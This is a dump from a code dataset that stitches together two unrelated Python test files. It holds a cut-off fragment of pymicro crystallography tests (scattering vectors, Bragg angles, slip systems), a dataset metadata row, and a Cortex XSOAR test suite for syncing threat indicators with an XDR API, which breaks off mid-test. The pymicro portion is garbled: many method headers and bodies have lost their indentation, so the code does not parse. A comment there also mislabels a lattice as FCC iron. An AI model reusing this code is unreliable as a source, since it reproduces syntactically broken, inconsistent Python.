hkl = HklPlane(2, 0, 0, Fe_fcc)
Gc = hkl.scattering_vector()
self.assertAlmostEqual(np.linalg.norm(Gc), 1 / hkl.interplanar_spacing())
Al_fcc = Lattice.face_centered_cubic(0.405)
hkl = HklPlane(0, 0, 2, lattice=Al_fcc)
Gc = hkl.scattering_vector()
self.assertAlmostEqual(np.linalg.norm(Gc), 1 / hkl.interplanar_spacing())
    def test_scattering_vector_th(self):
        """ compute the scattering vector using the formal definition and compare it with the components obtained
        using the reciprocal lattice.
        The formulae are available in the Laue Atlas p61, one typo in Eq. 6.1 was corrected. """
        (a, b, c) = self.hex._lengths
        (alpha, beta, gamma) = np.radians(self.hex._angles)
        # auxiliary angles of the Laue Atlas construction, derived only from
        # the lattice angles alpha, beta, gamma
        delta = pi / 2 - gamma
        chi = gamma - atan((cos(alpha) - cos(gamma) * cos(beta)) / (cos(beta) * cos(delta)))
        epsilon = pi / 2 - acos((cos(alpha) + cos(beta)) / (cos(chi) + cos(gamma - chi)))
        psi = acos(sin(epsilon) * cos(delta + chi))
        for (hp, kp, lp) in [(1, 1, 1), [1, 2, 0]]:
            # compute the h, k, l in the Cartesian coordinate system
            h = hp / a
            k = (a / hp - b / kp * cos(gamma)) / (a / hp * b / kp * cos(delta))
            l = (lp / c - hp / a * cos(beta) - kp / b * cos(psi)) / cos(epsilon)
            # the reciprocal lattice result must agree with the formal
            # definition to 7 decimals
            Gc = HklPlane(hp, kp, lp, self.hex).scattering_vector()
            self.assertAlmostEqual(Gc[0], h, 7)
            self.assertAlmostEqual(Gc[1], k, 7)
            self.assertAlmostEqual(Gc[2], l, 7)
def test_bragg_angle(self):
l = Lattice.cubic(0.287) # FCC iron
hkl = HklPlane(2, 0, 0, l) # 200 reflection at 8 keV is at 32.7 deg
self.assertAlmostEqual(hkl.bragg_angle(8), 0.5704164)
def test_4indices_representation(self):
h, k, l = HklPlane.four_to_three_indices(2, -1, -1, 0)
self.assertEqual(h, 2)
self.assertEqual(k, -1)
self.assertEqual(l, 0)
h, k, l = HklPlane.four_to_three_indices(1, 0, -1, 1)
self.assertEqual(h, 1)
self.assertEqual(k, 0)
self.assertEqual(l, 1)
h, k, i, l = HklPlane.three_to_four_indices(1, 1, 1)
self.assertEqual(h, 1)
self.assertEqual(k, 1)
self.assertEqual(i, -2)
self.assertEqual(l, 1)
h, k, i, l = HklPlane.three_to_four_indices(2, 1, 0)
self.assertEqual(h, 2)
self.assertEqual(k, 1)
self.assertEqual(i, -3)
self.assertEqual(l, 0)
class SlipSystemTests(unittest.TestCase):
    """Tests for the SlipSystem class."""

    def setUp(self):
        print('testing the SlipSystem class')

    def test_get_slip_system(self):
        """Each family yields 12 systems whose direction lies in the plane (n . l == 0)."""
        for family in ('111', '112'):
            systems = SlipSystem.get_slip_systems(family)
            self.assertEqual(len(systems), 12)
            for system in systems:
                plane_normal = system.get_slip_plane().normal()
                slip_direction = system.get_slip_direction().direction()
                self.assertAlmostEqual(np.dot(plane_normal, slip_direction), 0.)
if __name__ == '__main__':
    # run all test cases in this module when executed directly
    unittest.main()
| heprom/pymicro | pymicro/crystal/tests/test_Lattice.py | Python | mit | 15,718 | [
"CRYSTAL"
] | 266e405e9ec251da8033b563104cfe2a8b16dc81fe63181d04c0bfd08fe579b6 |
from XDR_iocs import *
import pytest
from freezegun import freeze_time
# module-level client shared by the tests below; severity is set on the
# class so every Client instance created here reports 'INFO'
Client.severity = 'INFO'
client = Client({'url': 'https://example.com'})
def d_sort(in_dict):
    """Return the (key, value) pairs of *in_dict* as a key-sorted list."""
    pairs = list(in_dict.items())
    pairs.sort()
    return pairs
class TestGetHeaders:
    """Tests for get_headers, which builds the XDR API authentication headers."""
    @freeze_time('2020-06-01T00:00:00Z')
    def test_sanity(self, mocker):
        """
        Given:
            - API key
            - API key ID
        Then:
            - Verify headers created correct.
        """
        params = {
            "apikey_id": "7",
            "apikey": "t3PkfrEhaRAD9a3r6Lq5cVPyqdMqtLd8cOJlSWUtbslkbERUgb2BTkSNRtDr3C6CWAgYqxvyzwDFJ83BLBgu1V2cxQY7rsoo2ks2u3W2aBL2BlteF8C8u75lCVUrNbv1"  # noqa: E501
        }
        # the expected values are deterministic because the clock is frozen
        # and secrets.choice is patched below to always return '1' (fixed nonce)
        headers = {
            'Authorization': 'da94963b561e3c95899d843b1284cecf410606e9e809be528ec1cf03880c6e9e',
            'x-iocs-source': 'xsoar',
            'x-xdr-auth-id': '7',
            'x-xdr-nonce': '1111111111111111111111111111111111111111111111111111111111111111',
            'x-xdr-timestamp': '1590969600000'
        }
        mocker.patch('secrets.choice', return_value='1')
        output = get_headers(params)
        assert output == headers, f'get_headers({params})\n\treturns: {d_sort(output)}\n\tinstead: {d_sort(headers)}'
    def test_empty_case(self):
        """
        Given:
            Empty params
        Then:
            get_headers will not raise error
        """
        get_headers({})
class TestHttpRequest:
    """Tests for Client.http_request: success path, error codes and bad-json handling."""
    def test_http_request_ok(self, requests_mock):
        """
        Given:
            - a client
        When:
            - http_request returns status code 200.
        Then:
            - do not raise an error
        """
        requests_mock.post('https://example.com/public_api/v1/indicators/suffix', status_code=200, json={})
        client.http_request(url_suffix='suffix', requests_kwargs={})
    # one case per status code the client maps to a known error message
    @pytest.mark.parametrize('status_code', client.error_codes.keys())
    def test_http_request_error(self, requests_mock, status_code):
        """
        Given:
            - Status code
        When:
            - http_request returns this status code.
        Then:
            - Verify error message.
            - Verify exception.res status code matches the http status code.
        """
        with pytest.raises(DemistoException) as e:
            requests_mock.post('https://example.com/public_api/v1/indicators/suffix', status_code=status_code)
            client.http_request('suffix', requests_kwargs={})
        assert e.value.message == client.error_codes[status_code]
        assert e.value.res.status_code == status_code
    def test_http_request_bad_json(self, requests_mock):
        """
        Given:
            - a client
        When:
            - http_request returns a response that is not a json.
        Then:
            - Verify error message.
            - Verify demisto exception
        """
        text = 'not a json'
        with pytest.raises(DemistoException) as e:
            requests_mock.post('https://example.com/public_api/v1/indicators/suffix', status_code=200, text=text)
            client.http_request('suffix', requests_kwargs={})
        assert e.value.message == f'Could not parse json out of {text}'
        assert e.value.res.status_code == 200
        assert isinstance(e.value.exception, json.JSONDecodeError)
        assert e.value.exception.args == ('Expecting value: line 1 column 1 (char 0)',)
class TestGetRequestsKwargs:
    """Tests for get_requests_kwargs, which builds the kwargs handed to requests."""

    def test_with_file(self, mocker):
        """
        Given:
            - file to upload
        Then:
            - Verify output format.
        """
        # make open() return the path itself so no real file is touched
        mocker.patch('builtins.open', side_effect=lambda open_path, *_other: open_path)
        file_path = '/Users/some_user/some_dir/some_file.file'
        result = get_requests_kwargs(file_path=file_path)
        expected = {'files': [('file', ('iocs.json', file_path, 'application/json'))]}
        assert result == expected, f'get_requests_kwargs(file_path={file_path})\n\treturns: {result}\n\t instead: {expected}'  # noqa: E501

    def test_with_json(self):
        """
        Given:
            - simple json
        Then:
            - the json ready to send
        """
        body = {'test': 'test'}
        result = get_requests_kwargs(_json=body)
        expected = {'data': '{"request_data": {"test": "test"}}'}
        assert result == expected, f'get_requests_kwargs(_json={body})\n\treturns: {result}\n\t instead: {expected}'  # noqa: E501
class TestPrepareCommands:
    """Tests for the prepare_* helpers that build url suffixes and payloads."""

    def test_prepare_get_changes(self):
        """
        Given:
            - get changes command
        Then:
            - Verify url and json format.
        """
        now_ms = int(datetime.now(timezone.utc).timestamp() * 1000)
        url_suffix, payload = prepare_get_changes(now_ms)
        assert url_suffix == 'get_changes', f'prepare_get_changes\n\treturns url_suffix: {url_suffix}\n\tinstead url_suffix: get_changes'  # noqa: E501
        assert payload == {'last_update_ts': now_ms}

    def test_prepare_enable_iocs(self):
        """
        Given:
            - enable iocs command
        Then:
            - Verify url and json format.
        """
        # a comma-separated string must be split into a list of indicators
        url_suffix, parsed_iocs = prepare_enable_iocs('8.8.8.8,domain.com')
        assert url_suffix == 'enable_iocs', f'prepare_enable_iocs\n\treturns url_suffix: {url_suffix}\n\tinstead url_suffix: enable_iocs'  # noqa: E501
        assert parsed_iocs == ['8.8.8.8', 'domain.com']

    def test_prepare_disable_iocs(self):
        """
        Given:
            - disable iocs command
        Then:
            - Verify url and json format.
        """
        url_suffix, parsed_iocs = prepare_disable_iocs('8.8.8.8,domain.com')
        assert url_suffix == 'disable_iocs', f'prepare_disable_iocs\n\treturns url_suffix: {url_suffix}\n\tinstead url_suffix: disable_iocs'  # noqa: E501
        assert parsed_iocs == ['8.8.8.8', 'domain.com']
class TestCreateFile:
    """Tests for create_file_sync / create_file_iocs_to_keep output files."""
    # shared scratch file created in setup and removed in teardown
    path = 'test_data/sync_file_test.json'
    # (input iocs fixture, expected sync-file fixture) per indicator type
    data_test_create_file_sync = [
        ('Domain_iocs', 'Domain_sync_file'),
        ('IP_iocs', 'IP_sync_file'),
        ('File_iocs', 'File_sync_file')
    ]
    # (input iocs fixture, expected iocs-to-keep fixture) per indicator type
    data_test_create_file_iocs_to_keep = [
        ('Domain_iocs', 'Domain_iocs_to_keep_file'),
        ('IP_iocs', 'IP_iocs_to_keep_file'),
        ('File_iocs', 'File_iocs_to_keep_file')
    ]
    def setup(self):
        # creates the file
        with open(TestCreateFile.path, 'w') as _file:
            _file.write('')
    def teardown(self):
        # removes the file when done
        os.remove(TestCreateFile.path)
    @staticmethod
    def get_file(path):
        # read a whole text file and return its content as one string
        with open(path, 'r') as _file:
            return _file.read()
    @staticmethod
    def get_all_iocs(go_over, extension):
        # merge several fixture files into a single iocs dict and concatenate
        # the matching expected output files into a single string
        iocs = []
        total = 0
        data = []
        for in_iocs, out_iocs in go_over:
            ioc = json.loads(TestCreateFile.get_file(f'test_data/{in_iocs}.json'))
            iocs.extend(ioc['iocs'])
            total += ioc['total']
            data.append(TestCreateFile.get_file(f'test_data/{out_iocs}.{extension}'))
        all_iocs = {'iocs': iocs, 'total': total}
        all_data = ''.join(data)
        return all_iocs, all_data
    def test_create_file_sync_without_iocs(self, mocker):
        """
        Given:
            - Sync command
        When:
            - there is no iocs
        Then:
            - Verify sync file data.
        """
        mocker.patch.object(demisto, 'searchIndicators', return_value={})
        create_file_sync(TestCreateFile.path)
        data = self.get_file(TestCreateFile.path)
        expected_data = ''
        assert data == expected_data, f'create_file_sync with no iocs\n\tcreates: {data}\n\tinstead: {expected_data}'
    @pytest.mark.parametrize('in_iocs, out_iocs', data_test_create_file_sync)
    def test_create_file_sync(self, in_iocs, out_iocs, mocker):
        """
        Given:
            - Sync command
        When:
            - iocs type is a specific type.
        Then:
            - Verify sync file data.
        """
        mocker.patch.object(demisto, 'searchIndicators', return_value=json.loads(self.get_file(f'test_data/{in_iocs}.json')))  # noqa: E501
        create_file_sync(TestCreateFile.path)
        data = self.get_file(TestCreateFile.path)
        expected_data = self.get_file(f'test_data/{out_iocs}.txt')
        assert data == expected_data, f'create_file_sync with {in_iocs} iocs\n\tcreates: {data}\n\tinstead: {expected_data}'
    def test_create_file_sync_all_types(self, mocker):
        """
        Given:
            - Sync command
        When:
            - iocs as all types
        Then:
            - Verify sync file data.
        """
        all_iocs, expected_data = self.get_all_iocs(self.data_test_create_file_sync, 'txt')
        mocker.patch.object(demisto, 'searchIndicators', return_value=all_iocs)
        create_file_sync(TestCreateFile.path)
        data = self.get_file(TestCreateFile.path)
        assert data == expected_data, f'create_file_sync with all iocs\n\tcreates: {data}\n\tinstead: {expected_data}'
    # indicators missing 'value', 'indicator_type', or both
    data_test_create_file_with_empty_indicators = [
        {},
        {'value': '11.11.11.11'},
        {'indicator_type': 'IP'}
    ]
    @pytest.mark.parametrize('defective_indicator', data_test_create_file_with_empty_indicators)
    def test_create_file_sync_with_empty_indicators(self, defective_indicator, mocker):
        """
        Given:
            - Sync command
        When:
            - a part iocs dont have all required data
        Then:
            - Verify sync file data.
        """
        all_iocs, expected_data = self.get_all_iocs(self.data_test_create_file_sync, 'txt')
        all_iocs['iocs'].append(defective_indicator)
        all_iocs['total'] += 1
        mocker.patch.object(demisto, 'searchIndicators', return_value=all_iocs)
        warnings = mocker.patch.object(demisto, 'debug')
        create_file_sync(TestCreateFile.path)
        data = self.get_file(TestCreateFile.path)
        assert data == expected_data, f'create_file_sync with all iocs\n\tcreates: {data}\n\tinstead: {expected_data}'
        # the defective indicator must be skipped with a debug warning
        error_msg = warnings.call_args.args[0]
        assert error_msg.startswith("unexpected IOC format in key: '"), f"create_file_sync empty message\n\tstarts: {error_msg}\n\tinstead: unexpected IOC format in key: '"  # noqa: E501
        assert error_msg.endswith(f"', {str(defective_indicator)}"), f"create_file_sync empty message\n\tends: {error_msg}\n\tinstead: ', {str(defective_indicator)}"  # noqa: E501
    def test_create_file_iocs_to_keep_without_iocs(self, mocker):
        """
        Given:
            - iocs to keep command
        When:
            - there is no iocs
        Then:
            - Verify iocs to keep file data.
        """
        mocker.patch.object(demisto, 'searchIndicators', return_value={})
        create_file_iocs_to_keep(TestCreateFile.path)
        data = self.get_file(TestCreateFile.path)
        expected_data = ''
        assert data == expected_data, f'create_file_iocs_to_keep with no iocs\n\tcreates: {data}\n\tinstead: {expected_data}'
    @pytest.mark.parametrize('in_iocs, out_iocs', data_test_create_file_iocs_to_keep)
    def test_create_file_iocs_to_keep(self, in_iocs, out_iocs, mocker):
        """
        Given:
            - iocs to keep command
        When:
            - iocs type is a specific type.
        Then:
            - Verify iocs to keep file data.
        """
        mocker.patch.object(demisto, 'searchIndicators', return_value=json.loads(
            self.get_file(f'test_data/{in_iocs}.json')))
        create_file_iocs_to_keep(TestCreateFile.path)
        data = self.get_file(TestCreateFile.path)
        expected_data = self.get_file(f'test_data/{out_iocs}.txt')
        assert data == expected_data, f'create_file_iocs_to_keep with {in_iocs} iocs\n\tcreates: {data}\n\tinstead: {expected_data}'  # noqa: E501
    def test_create_file_iocs_to_keep_all_types(self, mocker):
        """
        Given:
            - iocs to keep command
        When:
            - iocs as all types
        Then:
            - Verify iocs to keep file data.
        """
        all_iocs, expected_data = self.get_all_iocs(self.data_test_create_file_iocs_to_keep, 'txt')
        mocker.patch.object(demisto, 'searchIndicators', return_value=all_iocs)
        create_file_iocs_to_keep(TestCreateFile.path)
        data = self.get_file(TestCreateFile.path)
        assert data == expected_data, f'create_file_iocs_to_keep with all iocs\n\tcreates: {data}\n\tinstead: {expected_data}'
class TestDemistoIOCToXDR:
    """Tests converting indicators from the demisto format to the XDR format."""
    # (demisto expiration string, expected XDR epoch-ms expiration; -1 means never)
    data_test_demisto_expiration_to_xdr = [
        (None, -1),
        ('', -1),
        ('0001-01-01T00:00:00Z', -1),
        ('2020-06-03T00:00:00Z', 1591142400000)
    ]
    @pytest.mark.parametrize('demisto_expiration, xdr_expiration', data_test_demisto_expiration_to_xdr)
    def test_demisto_expiration_to_xdr(self, demisto_expiration, xdr_expiration):
        """
        Given:
            - demisto indicator expiration
        Then:
            - Verify XDR expiration.
        """
        output = demisto_expiration_to_xdr(demisto_expiration)
        assert xdr_expiration == output, f'demisto_expiration_to_xdr({demisto_expiration})\n\treturns: {output}\n\tinstead: {xdr_expiration}'  # noqa: E501
    # (demisto reliability label, expected single-letter XDR reliability)
    data_test_demisto_reliability_to_xdr = [
        (None, 'F'),
        ('A - Completely reliable', 'A'),
        ('B - Usually reliable', 'B'),
        ('C - Fairly reliable', 'C'),
        ('D - Not usually reliable', 'D'),
        ('E - Unreliable', 'E'),
        ('F - Reliability cannot be judged', 'F')
    ]
    @pytest.mark.parametrize('demisto_reliability, xdr_reliability', data_test_demisto_reliability_to_xdr)
    def test_demisto_reliability_to_xdr(self, demisto_reliability, xdr_reliability):
        """
        Given:
            - demisto indicator reliability
        Then:
            - Verify XDR reliability.
        """
        output = demisto_reliability_to_xdr(demisto_reliability)
        assert output == xdr_reliability, f'demisto_reliability_to_xdr({demisto_reliability})\n\treturns: {output}\n\tinstead: {xdr_reliability}'  # noqa: E501
    # (demisto indicator type, expected XDR type)
    data_test_demisto_types_to_xdr = [
        ('File', 'HASH'),
        ('IP', 'IP'),
        ('Domain', 'DOMAIN_NAME')
    ]
    @pytest.mark.parametrize('demisto_type, xdr_type', data_test_demisto_types_to_xdr)
    def test_demisto_types_to_xdr(self, demisto_type, xdr_type):
        """
        Given:
            - demisto indicator type
        Then:
            - Verify XDR type.
        """
        output = demisto_types_to_xdr(demisto_type)
        assert output == xdr_type, f'demisto_reliability_to_xdr({demisto_type})\n\treturns: {output}\n\tinstead: {xdr_type}'
    # (demisto moduleToFeedMap entry, expected XDR vendor record)
    data_test_demisto_vendors_to_xdr = [
        (
            {'moduleID': {'sourceBrand': 'test', 'reliability': 'A - Completely reliable', 'score': 2}},
            {'vendor_name': 'test', 'reputation': 'SUSPICIOUS', 'reliability': 'A'}
        ),
        (
            {'moduleID': {'reliability': 'A - Completely reliable', 'score': 2}},
            {'vendor_name': 'moduleID', 'reputation': 'SUSPICIOUS', 'reliability': 'A'}
        ),
        (
            {'moduleID': {'sourceBrand': 'test', 'score': 2}},
            {'vendor_name': 'test', 'reputation': 'SUSPICIOUS', 'reliability': 'F'}
        ),
        (
            {'moduleID': {'reliability': 'A - Completely reliable', 'score': 0}},
            {'vendor_name': 'moduleID', 'reputation': 'UNKNOWN', 'reliability': 'A'}
        )
    ]
    @pytest.mark.parametrize('demisto_vendor, xdr_vendor', data_test_demisto_vendors_to_xdr)
    def test_demisto_vendors_to_xdr(self, demisto_vendor, xdr_vendor):
        """
        Given:
            - demisto indicator vendors reports.
        Then:
            - Verify XDR vendors format.
        """
        output = demisto_vendors_to_xdr(demisto_vendor)[0]
        assert output == xdr_vendor, f'demisto_vendors_to_xdr({demisto_vendor})\n\treturns: {d_sort(output)}\n\tinstead: {d_sort(xdr_vendor)}'  # noqa: E501
    # (full demisto indicator, expected full XDR indicator)
    data_test_demisto_ioc_to_xdr = [
        (
            {'value': '11.11.11.11', 'indicator_type': 'IP', 'score': 2},
            {'expiration_date': -1, 'indicator': '11.11.11.11', 'reputation': 'SUSPICIOUS', 'severity': 'INFO',
             'type': 'IP'}
        ),
        (
            {'value': '11.11.11.11', 'indicator_type': 100, 'score': 2},
            {'expiration_date': -1, 'indicator': '11.11.11.11', 'reputation': 'SUSPICIOUS', 'severity': 'INFO', 'type': '100'}
        ),
        (
            {'value': '11.11.11.11', 'indicator_type': 'IP'},
            {'expiration_date': -1, 'indicator': '11.11.11.11', 'reputation': 'UNKNOWN', 'severity': 'INFO', 'type': 'IP'}
        ),
        (
            {'value': '11.11.11.11', 'indicator_type': 'IP', 'expiration': '2020-06-03T00:00:00Z'},
            {'expiration_date': 1591142400000, 'indicator': '11.11.11.11', 'reputation': 'UNKNOWN', 'severity': 'INFO', 'type': 'IP'}  # noqa: E501
        ),
        (
            {'value': '11.11.11.11', 'indicator_type': 'IP', 'comments': [{'type': 'IndicatorCommentTimeLine', 'content': 'test'}]},  # noqa: E501
            {'expiration_date': -1, 'indicator': '11.11.11.11', 'reputation': 'UNKNOWN', 'severity': 'INFO', 'type': 'IP'}
        ),
        (
            {'value': '11.11.11.11', 'indicator_type': 'IP', 'comments': [{'type': 'IndicatorCommentRegular', 'content': 'test'}]},  # noqa: E501
            {'expiration_date': -1, 'indicator': '11.11.11.11', 'reputation': 'UNKNOWN', 'severity': 'INFO', 'type': 'IP', 'comment': 'test'}  # noqa: E501
        ),
        (
            {'value': '11.11.11.11', 'indicator_type': 'IP', 'comments': [{'type': 'IndicatorCommentRegular', 'content': 'test'}, {'type': 'IndicatorCommentRegular', 'content': 'this is the comment'}]},  # noqa: E501
            {'expiration_date': -1, 'indicator': '11.11.11.11', 'reputation': 'UNKNOWN', 'severity': 'INFO', 'type': 'IP', 'comment': 'this is the comment'}  # noqa: E501
        ),
        (
            {'value': '11.11.11.11', 'indicator_type': 'IP', 'aggregatedReliability': 'A - Completely reliable'},
            {'expiration_date': -1, 'indicator': '11.11.11.11', 'reputation': 'UNKNOWN', 'severity': 'INFO', 'type': 'IP', 'reliability': 'A'}  # noqa: E501
        ),
        (
            {'value': '11.11.11.11', 'indicator_type': 'IP', 'CustomFields': {'threattypes': {'threatcategory': 'Malware'}}},  # noqa: E501
            {'expiration_date': -1, 'indicator': '11.11.11.11', 'reputation': 'UNKNOWN', 'severity': 'INFO', 'type': 'IP', 'class': 'Malware'}  # noqa: E501
        ),
        (
            {'value': '11.11.11.11', 'indicator_type': 'IP', 'moduleToFeedMap': {'module': {'sourceBrand': 'test', 'score': 2}}},  # noqa: E501
            {'expiration_date': -1, 'indicator': '11.11.11.11', 'reputation': 'UNKNOWN', 'severity': 'INFO', 'type': 'IP', 'vendors': [{'vendor_name': 'test', 'reputation': 'SUSPICIOUS', 'reliability': 'F'}]}  # noqa: E501
        )
    ]
    @pytest.mark.parametrize('demisto_ioc, xdr_ioc', data_test_demisto_ioc_to_xdr)
    def test_demisto_ioc_to_xdr(self, demisto_ioc, xdr_ioc):
        """
        Given:
            - demisto indicator.
        Then:
            - Verify XDR indicator format.
        """
        output = demisto_ioc_to_xdr(demisto_ioc)
        assert output == xdr_ioc, f'demisto_ioc_to_xdr({demisto_ioc})\n\treturns: {d_sort(output)}\n\tinstead: {d_sort(xdr_ioc)}'  # noqa: E501
    def test_empty_demisto_ioc_to_xdr(self, mocker):
        # an empty indicator must convert to {} and emit a debug warning
        warnings = mocker.patch.object(demisto, 'debug')
        output = demisto_ioc_to_xdr({})
        assert output == {}, 'demisto_ioc_to_xdr({})\n\treturns: ' + str(d_sort(output)) + '\n\tinstead: {}'
        assert warnings.call_args.args[0] == "unexpected IOC format in key: 'value', {}"
class TestXDRIOCToDemisto:
    """Tests converting indicators from the XDR format back to the demisto format."""
    # (XDR epoch-ms expiration, expected demisto expiration string)
    data_test_xdr_expiration_to_demisto = [
        (-1, 'Never'),
        (1591142400000, '2020-06-03T00:00:00Z'),
        (1592142400000, '2020-06-14T13:46:40Z')
    ]
    @pytest.mark.parametrize('xdr_expiration, demisto_expiration', data_test_xdr_expiration_to_demisto)
    def test_xdr_expiration_to_demisto(self, xdr_expiration, demisto_expiration):
        """
        Given:
            - expiration in XDR format.
        Then:
            - expiration in demisto format.
        """
        output = xdr_expiration_to_demisto(xdr_expiration)
        assert output == demisto_expiration, f'xdr_expiration_to_demisto({xdr_expiration})\n\treturns: {output}\n\tinstead: {demisto_expiration}'  # noqa: E501
    # (raw XDR rule, expected demisto indicator without its rawJSON)
    data_test_xdr_ioc_to_demisto = [
        (
            {
                'RULE_ID': 863, 'RULE_INSERT_TIME': 1591165763753, 'RULE_MODIFY_TIME': 1591166095668,
                'RULE_SEVERITY': 'SEV_010_INFO', 'NUMBER_OF_HITS': 0, 'RULE_SOURCE': 'XSOAR TIM', 'RULE_COMMENT': '',
                'RULE_STATUS': 'DISABLED', 'BS_STATUS': 'DONE', 'BS_TS': 1591165801230, 'BS_RETRIES': 1,
                'RULE_EXPIRATION_TIME': -1, 'IOC_TYPE': 'HASH',
                'RULE_INDICATOR': 'fa66f1e0e318b6d7b595b6cee580dc0d8e4ac38fbc8dbfcac6ad66dbe282832e', 'REPUTATION': 'GOOD',  # noqa: E501
                'RELIABILITY': None, 'VENDORS': None, 'KLASS': None, 'IS_DEFAULT_TTL': False, 'RULE_TTL': -1,
                'MARKED_DELETED': 0
            },
            {
                'value': 'fa66f1e0e318b6d7b595b6cee580dc0d8e4ac38fbc8dbfcac6ad66dbe282832e',
                'type': 'File',
                'score': 1,
                'fields': {
                    'expirationdate': 'Never',
                    'tags': 'Cortex XDR',
                    'xdrstatus': 'disabled'
                }
            }
        ),
        (
            {
                'RULE_ID': 861, 'RULE_INSERT_TIME': 1591165763753, 'RULE_MODIFY_TIME': 1591166095668,
                'RULE_SEVERITY': 'SEV_010_INFO', 'NUMBER_OF_HITS': 0, 'RULE_SOURCE': 'XSOAR TIM', 'RULE_COMMENT': '',
                'RULE_STATUS': 'DISABLED', 'BS_STATUS': 'DONE', 'BS_TS': 1591165801784, 'BS_RETRIES': 1,
                'RULE_EXPIRATION_TIME': -1, 'IOC_TYPE': 'DOMAIN_NAME', 'RULE_INDICATOR': 'test.com', 'REPUTATION': 'GOOD',  # noqa: E501
                'RELIABILITY': None, 'VENDORS': None, 'KLASS': None, 'IS_DEFAULT_TTL': False, 'RULE_TTL': -1,
                'MARKED_DELETED': 0
            },
            {
                'value': 'test.com',
                'type': 'Domain',
                'score': 1,
                'fields': {
                    'expirationdate': 'Never',
                    'tags': 'Cortex XDR',
                    'xdrstatus': 'disabled'
                }
            }
        ),
        (
            {
                'RULE_ID': 862, 'RULE_INSERT_TIME': 1591165763753, 'RULE_MODIFY_TIME': 1591166095668,
                'RULE_SEVERITY': 'SEV_010_INFO', 'NUMBER_OF_HITS': 0, 'RULE_SOURCE': 'XSOAR TIM', 'RULE_COMMENT': '',
                'RULE_STATUS': 'ENABLED', 'BS_STATUS': 'DONE', 'BS_TS': 1591165801784, 'BS_RETRIES': 1,
                'RULE_EXPIRATION_TIME': -1, 'IOC_TYPE': 'DOMAIN_NAME', 'RULE_INDICATOR': 'test.co.il',
                'REPUTATION': 'SUSPICIOUS', 'RELIABILITY': 'A',
                'VENDORS': [{'vendor_name': 'Cortex XDR - IOC', 'reputation': 'SUSPICIOUS', 'reliability': 'A'}],
                'KLASS': None,
                'IS_DEFAULT_TTL': False, 'RULE_TTL': -1, 'MARKED_DELETED': 0
            },
            {
                'value': 'test.co.il',
                'type': 'Domain',
                'score': 2,
                'fields': {
                    'expirationdate': 'Never',
                    'tags': 'Cortex XDR',
                    'xdrstatus': 'enabled'
                }
            }
        )
    ]
    @pytest.mark.parametrize('xdr_ioc, demisto_ioc', data_test_xdr_ioc_to_demisto)
    def test_xdr_ioc_to_demisto(self, xdr_ioc, demisto_ioc, mocker):
        """
        Given:
            - IOC in XDR format.
        Then:
            - IOC in demisto format.
        """
        mocker.patch.object(demisto, 'searchIndicators', return_value={})
        output = xdr_ioc_to_demisto(xdr_ioc)
        # rawJSON carries the original XDR payload and is not part of the comparison
        del output['rawJSON']
        assert output == demisto_ioc, f'xdr_ioc_to_demisto({xdr_ioc})\n\treturns: {d_sort(output)}\n\tinstead: {d_sort(demisto_ioc)}'  # noqa: E501
class TestCommands:
    # test commands full flow
    class TestIOCSCommand:
        """Tests for iocs_command dispatching the enable/disable sub-commands."""
        def test_iocs_command_with_enable(self, mocker):
            """
            Given:
                - enable command
            Then:
                - Verify enable command is called.
            """
            mocker.patch.object(demisto, 'command', return_value='xdr-iocs-enable')
            mocker.patch.object(demisto, 'args', return_value={'indicator': '11.11.11.11'})
            mocker.patch('XDR_iocs.Client.http_request', return_value={})
            outputs = mocker.patch('XDR_iocs.return_outputs')
            enable_ioc = mocker.patch('XDR_iocs.prepare_enable_iocs', side_effect=prepare_enable_iocs)
            iocs_command(client)
            output = outputs.call_args.args[0]
            assert output == 'indicators 11.11.11.11 enabled.', f'enable command\n\tprints: {output}\n\tinstead: indicators 11.11.11.11 enabled.'  # noqa: E501
            assert enable_ioc.call_count == 1, 'enable command not called'
        def test_iocs_command_with_disable(self, mocker):
            """
            Given:
                - disable command
            Then:
                - Verify disable command is called.
            """
            mocker.patch.object(demisto, 'command', return_value='xdr-iocs-disable')
            mocker.patch.object(demisto, 'args', return_value={'indicator': '11.11.11.11'})
            mocker.patch('XDR_iocs.Client.http_request', return_value={})
            outputs = mocker.patch('XDR_iocs.return_outputs')
            disable_ioc = mocker.patch('XDR_iocs.prepare_disable_iocs', side_effect=prepare_disable_iocs)
            iocs_command(client)
            output = outputs.call_args.args[0]
            assert output == 'indicators 11.11.11.11 disabled.', f'disable command\n\tprints: {output}\n\tinstead: indicators 11.11.11.11 disabled.'  # noqa: E501
            assert disable_ioc.call_count == 1, 'disable command not called'
    def test_sync(self, mocker):
        """sync must POST to the sync_tim_iocs endpoint."""
        http_request = mocker.patch.object(Client, 'http_request')
        iocs, _ = TestCreateFile.get_all_iocs(TestCreateFile.data_test_create_file_sync, 'txt')
        # bug fix: 'returnvalue' was a typo for 'return_value'; the bogus
        # kwarg only set a '.returnvalue' attribute on the mock, so the
        # patched searchIndicators returned a MagicMock, not the fixture
        mocker.patch.object(demisto, 'searchIndicators', return_value=iocs)
        mocker.patch('XDR_iocs.return_outputs')
        sync(client)
        assert http_request.call_args.args[0] == 'sync_tim_iocs', 'sync command url changed'
    def test_get_sync_file(self, mocker):
        """get_sync_file must return a war-room file entry named xdr-sync-file."""
        iocs, _ = TestCreateFile.get_all_iocs(TestCreateFile.data_test_create_file_sync, 'txt')
        # bug fix: 'returnvalue' -> 'return_value' (same typo as in test_sync)
        mocker.patch.object(demisto, 'searchIndicators', return_value=iocs)
        return_results_mock = mocker.patch('XDR_iocs.return_results')
        get_sync_file()
        assert return_results_mock.call_args[0][0]['File'] == 'xdr-sync-file'
    def test_set_sync_time(self, mocker):
        """set_sync_time must store ts/time/iocs_to_keep_time in the integration context."""
        mocker_reurn_results = mocker.patch('XDR_iocs.return_results')
        mocker_set_context = mocker.patch.object(demisto, 'setIntegrationContext')
        set_sync_time('2021-11-25T00:00:00')
        mocker_reurn_results.assert_called_once_with('set sync time to 2021-11-25T00:00:00 seccedded.')
        call_args = mocker_set_context.call_args[0][0]
        assert call_args['ts'] == 1637798400000
        assert call_args['time'] == '2021-11-25T00:00:00Z'
        assert call_args['iocs_to_keep_time']
    def test_set_sync_time_with_invalid_time(self):
        """An unparsable time string must raise ValueError."""
        with pytest.raises(ValueError, match='invalid time format.'):
            set_sync_time('test')
    @freeze_time('2020-06-03T02:00:00Z')
    def test_iocs_to_keep(self, mocker):
        """iocs_to_keep must POST to the iocs_to_keep endpoint."""
        http_request = mocker.patch.object(Client, 'http_request')
        iocs, _ = TestCreateFile.get_all_iocs(TestCreateFile.data_test_create_file_iocs_to_keep, 'txt')
        # bug fix: 'returnvalue' -> 'return_value' (same typo as in test_sync)
